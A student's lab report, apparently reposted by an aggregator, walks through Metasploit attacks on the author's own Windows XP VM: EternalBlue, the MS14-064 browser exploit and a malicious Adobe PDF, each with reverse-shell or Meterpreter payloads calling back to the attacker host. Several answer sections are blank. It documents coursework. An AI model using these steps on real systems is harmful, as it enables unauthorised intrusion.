2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用
Posted ysz-123
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用相关的知识,希望对你有一定的参考价值。
目录
实验内容
- 一个主动攻击实践,如ms08_067
- 一个针对浏览器的攻击,如ms11_050
- 一个针对客户端的攻击,如Adobe
- 成功应用任何一个辅助模块
基础问题回答
- 用自己的话解释什么是exploit,payload,encode
- 答:
encode:编码格式
实践总结与体会
离实战还缺些什么技术或步骤?
实践过程记录
一个主动攻击实践:ms17_010
-
cd /usr/share/metasploit-framework/modules/exploits/
里找点想尝试的漏洞,比如ms17_010(我在尝试调试我的终端的颜色,有点丑,后面又改回去了)
-
再确定攻击的靶机为自己想攻击的后,利用辅助模块的scanner检测是否符合漏洞条件
use auxiliary/scanner/smb/smb_ms17_010
show options
查看需要填写的参数,然后设置那些参数run
就好啦
-
那攻击一下试试
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
选择攻击载荷show options
- 自己填写一下参数
exploit
它
-可以尝试使用windows命令行瞅瞅,嗯,充分的展示了我的中文乱码
针对浏览器的攻击:ms14_064
- 攻击一下试试
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.121.128
不要傻了吧唧的改了SRVPORT ,尤其是跟LPORT一样,当然好奇的的话可以试试set LHOST 192.168.121.128
都是攻击机哒set LPORT 5234
exploit
- Windows端打开生成的URL,就可以看到一个session 1啦
- 然后我们
Ctrl C
一下,再输入sessions -i 1
就可以接管我们的XP机器啦
针对客户端的攻击:adobe_toolbutton
- 攻击一下试试
use exploit/windows/fileformat/adobe_toolbutton
set payload windows/meterpreter/reverse_tcp
show options
,然后自己填一下吧
- 把生成的
5234msf.pdf
拖到靶机 - 打开kali端监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
,然后自己配置一下吧exploit
- Windows端打开5234msf.pdf文件
再来个针对客户端的攻击:Xenorate
- 找个针对靶机XP的攻击模块:
search Xenorate
use exploit/windows/fileformat/vuplayer_cue
,info
再确认一下
set payload windows/meterpreter/reverse_tcp
show options
,再自己手动填写一下
exploit
好的,成功看到一个报错Exploit failed: No encoders encoded the buffer successfully
查了一下资料,普遍是说,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同?
应用一个辅助模块
实验资料参考
END
以上是关于2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章
2019-2020-2 20175234 赵诗玥 《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175234 《网络对抗》 Exp0 Kali安装
20175234 2018-2019-2 实验五 网络编程与安全